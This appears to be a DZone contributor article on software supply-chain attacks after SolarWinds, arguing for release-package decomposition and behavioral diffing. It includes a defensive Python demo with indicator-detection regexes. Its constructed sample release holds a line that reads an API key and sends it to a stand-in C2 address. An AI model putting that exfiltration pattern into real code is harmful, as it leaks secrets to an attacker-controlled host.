A New Era of Software Processes Is on the Horizon
Learn about security gaps and new analysis processes that are needed in order to help developers and consumers secure what they build and verify what they buy.
The report late last year from FireEye of a state-sponsored attack targeting SolarWinds’ Orion software sent a shockwave through the industry, and the reverberations from the discovery are continuing to ripple. As many as 18,000 SolarWinds customers — including at least nine U.S. government agencies — downloaded a trojanized update of the network monitoring and management solution carrying the SunBurst backdoor. Moreover, according to a recent study from IronNet, the average financial impact of that attack was 11% of annual revenue, or about $12 million per company.
U.S. intelligence has attributed the attack to Russian state-sponsored hackers, who compromised multiple Orion software updates released between March and June 2020, giving the attackers a backdoor into every system that installed them. Our research found that the Orion build and code-signing infrastructure was compromised: the source of the affected library was modified during the build to include malicious backdoor code, which was then compiled, signed with SolarWinds’ legitimate certificate, and delivered through the existing patch release management system.
And the attacks have continued in the months following the SolarWinds revelations. In March, it was learned that Microsoft Exchange Server was the victim of zero-day vulnerabilities exploited by the Chinese nation-state actor HAFNIUM, and a month later code coverage and testing company Codecov announced that it had been targeted in a supply-chain breach. The Codecov attackers reportedly went on to breach hundreds of customer networks, according to one investigator, using credentials harvested by the altered Bash Uploader script.
At the same time, critical infrastructure is also being targeted. In two high-profile cases, Russian cybercriminals are accused of ransomware attacks on Colonial Pipeline in May and JBS Foods in June, disrupting the fuel and meat processing industries, respectively. Earlier this year, two Chinese espionage groups and other hackers are suspected of exploiting Pulse Connect Secure VPN appliances to steal sensitive information in attacks that hit the transportation and telecommunications verticals in the United States and Europe.
Supply-chain attacks aren’t new. A 2019 Symantec report found that such assaults had increased 78% the year before. What’s worrying is the level of stealth and sophistication. The SunBurst attackers stayed undetected by blending into the affected code base, mimicking the developers’ coding style and naming standards. They also didn’t start operating immediately; the malware lay dormant on the system for up to two weeks before first contacting its command-and-control infrastructure, and only then began gathering data and credentials.
The attack will likely be used as a blueprint by other attackers. Monitoring and management tools like Orion, which run with broad privileges across a customer’s estate, are increasingly attractive targets. The Codecov supply-chain attack has drawn the same comparison: attackers compromised a developer automation tool in order to reach thousands of downstream customers at once. Company executives, security pros, and developers alike, on both the production and consumption sides, need to ensure they have the tools required to mitigate and prevent these kinds of attacks.
Minding the Gaps
The SolarWinds case highlights the challenge of protecting against attacks that come through a vulnerable supply chain. In these cases the attackers target a company’s vendors and their products, using them as Trojan horses to get into the ultimate target’s systems. In this instance, a third party’s software was used to plant a backdoor that granted access.
While traditional security products can discover vulnerabilities, open-source software violations, and coding defects, they aren’t equipped to address malware that may be inadvertently or maliciously built into the code or certificates that are abused to exploit trust.
There are several security gaps in the software supply chain that need to be addressed. For developers and software buyers, that means understanding key issues such as:
- Security code scans: Application security testing (AST) technologies like Static and Dynamic AST designed to identify potential security vulnerabilities and architectural weaknesses don’t address malware that’s unknowingly embedded in published software.
- Binary scans: Antivirus and sandbox tools (the latter used to safely execute suspicious code without risking harm to the host device or network) are built for individual files and don’t handle whole software packages and installers, which are large, complex, nested archives.
- Certificates and code signatures: Security vendors usually assume a chain of trust is in place, which means if the code is properly signed, they don’t inspect it. In the SolarWinds case, attackers took advantage of the assumption of trust, placing the malware into the development process and codebase.
- Software safety at points in time: Software might be approved, free of threats, and verified gold at one point in time, but later found to have malware after it’s been published.
- Compliance questions: Software that complies with security policies still can be exploited by advanced attackers, so simply asking about compliance isn’t enough.
New Processes Are Needed
Many of the best cyber security minds are looking at the SolarWinds attack to determine what happened, and more information is sure to make its way to the surface. However, we already know enough to appreciate that not enough is being done yet to protect the supply chain. In particular, managed service providers (MSPs) and managed security services providers (MSSPs) have in recent years become favored targets of hackers who see their RMM software as an avenue into their customers’ infrastructure. That may begin to change.
The SolarWinds attack brought into sharp focus the need for an additional software analysis process that protects both software developers and users from such supply chain attacks. Advancing that process means taking steps to secure what you build and verify what you buy:
- Decompose software images: Release packages that are ready for commercial distribution need to be unpacked and inspected before they are released or used, by a system that is part of the development and release cycle and is built to look for software tampering, digital signing problems, and build-quality issues. This way issues can be found and eliminated before distribution.
- Scan libraries and code: By scanning third-party and open-source libraries, source code, and golden images, and by looking for more than known vulnerabilities, developers and consumers can verify the software’s integrity.
- Track software behaviors: The system also needs to extract static behavioral indicators from each compiled version of the software and compare them across versions. These indicators describe what the code will be able to do on the machine running it (network access, process execution, credential handling, and so on), and unexplained differences between versions can point to tampering or embedded threats.
- Determine software deployment risks: Improved processes should also address the range of risks that come with using the software, including known vulnerabilities, certificate validation, enabled mitigations, third-party components, and embedded malware.
- Look for anomalies: Scanning for more than just malware means delivering a unified view of software packages, digital signatures, security mitigations, composition, and the like, and it should be done throughout the QA and deployment process.
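The decompose, scan and track-behaviors steps above are easiest to see as one pipeline run over two consecutive releases. The following is an added example written for this page, not code from the original article or from any vendor product: it builds two constructed zip "release packages" in memory (sample data, not real software), decomposes each into its components, records a per-component SHA-256 manifest so later tampering can be detected, extracts a small hypothetical set of static behavioral indicators (network, process execution, credential access, hashing) from each component, and reports components that are new or that gained capabilities between releases. The indicator regexes and file names are illustrative assumptions; a production analyzer would extract imports, strings and API calls from parsed binaries rather than grep raw bytes.

```python
"""Decompose two release packages, diff their manifests and compare static
behavioral indicators. Added example (stdlib only); the packages built below
are constructed sample data, not real vendor releases."""
import hashlib
import io
import re
import zipfile
from typing import Dict, List

# Hypothetical, minimal indicator set: what a component *could* do on the host.
INDICATORS = {
    "network": re.compile(rb"https?://|socket\.|urlopen|requests\."),
    "exec": re.compile(rb"subprocess|os\.system|CreateProcess|ShellExecute"),
    "credentials": re.compile(rb"password|secret|token|api[_-]?key", re.I),
    "crypto_hash": re.compile(rb"hashlib|sha256|md5|CryptHashData"),
}


def build_package(files: Dict[str, bytes]) -> bytes:
    """Construct a zip 'release package' in memory (sample data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()


def decompose(package: bytes) -> Dict[str, bytes]:
    """Unpack every component of the package into memory."""
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        return {i.filename: zf.read(i) for i in zf.infolist() if not i.is_dir()}


def manifest(components: Dict[str, bytes]) -> Dict[str, str]:
    """Per-component SHA-256: the minimum record needed to prove that what is
    installed later is byte-for-byte what was built and verified."""
    return {n: hashlib.sha256(d).hexdigest() for n, d in components.items()}


def indicators(data: bytes) -> Dict[str, int]:
    """Count static behavioral indicators in one component."""
    return {label: len(rx.findall(data)) for label, rx in INDICATORS.items()}


def diff_releases(old_pkg: bytes, new_pkg: bytes) -> Dict[str, object]:
    """Compare two releases: added/removed/modified components plus any
    component whose indicator counts grew (behavioral drift)."""
    old, new = decompose(old_pkg), decompose(new_pkg)
    old_m, new_m = manifest(old), manifest(new)
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    modified = sorted(n for n in set(old) & set(new) if old_m[n] != new_m[n])
    behavior_changes = {}
    for name in modified + added:
        before = indicators(old[name]) if name in old else {k: 0 for k in INDICATORS}
        after = indicators(new[name])
        grew = {k: (before[k], after[k]) for k in INDICATORS if after[k] > before[k]}
        if grew:
            behavior_changes[name] = grew
    return {"added": added, "removed": removed, "modified": modified,
            "behavior_changes": behavior_changes}


def findings(report: Dict[str, object]) -> List[str]:
    """Human-readable review items a release gate would raise."""
    out = [f"new component {n}: review before accepting" for n in report["added"]]
    for name, grew in report["behavior_changes"].items():
        out.append(f"{name} gained {', '.join(grew)} capabilities")
    return out


# Constructed sample releases (not real vendor code). Release 1.1 changes one
# existing module so it reads a credential and beacons out, and adds a new DLL.
RELEASE_1 = build_package({
    "app/version.txt": b"1.0\n",
    "app/collector.py": b"import hashlib\n\ndef run():\n"
                        b"    return hashlib.sha256(b'x').hexdigest()\n",
    "app/util.py": b"def add(a, b):\n    return a + b\n",
})
RELEASE_2 = build_package({
    "app/version.txt": b"1.1\n",
    "app/collector.py": b"import hashlib\nfrom urllib.request import urlopen\n\n"
                        b"def run():\n    token = open('api_key').read()\n"
                        b"    urlopen('http://203.0.113.5/c2', data=token.encode())\n"
                        b"    return hashlib.sha256(b'x').hexdigest()\n",
    "app/util.py": b"def add(a, b):\n    return a + b\n",
    "app/helper.dll": b"MZ...CreateProcess...",
})

if __name__ == "__main__":
    for line in findings(diff_releases(RELEASE_1, RELEASE_2)):
        print(line)
```

Run against the two sample packages, the gate reports the new `app/helper.dll` and flags `app/collector.py` for gaining network and credential-access indicators even though it is still a validly packaged, same-named component. That is exactly the signal a signature check alone cannot give: a signed release can still carry a module whose capabilities silently changed between versions.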
SolarWinds Is Just the Beginning
Groups, including those associated with nation-states, will continue to target the supply chain as they look for more avenues into enterprises’ systems. The European Union Agency for Cybersecurity expects software supply chain attacks to quadruple in 2021 compared with last year, and Gartner predicts that 45 percent of organizations will have suffered a software supply chain attack by 2025. The recent attacks on Colonial Pipeline, JBS Foods, and Microsoft Exchange Server are only the latest points of proof. The bad actors behind the SunBurst malware demonstrated just one way it can be done, and the reach such an attack can have.
Developers, the IT staff who deploy software, and the business units that use it need to put new processes in place that go beyond the traditional security solutions that we now know fall short against these kinds of third-party attacks. Scanning for known threats and vulnerabilities isn’t enough. The integrity of the software needs to be verified throughout the development lifecycle and again at the point of consumption. Otherwise, the door will stay wide open for these kinds of attacks.
Opinions expressed by DZone contributors are their own.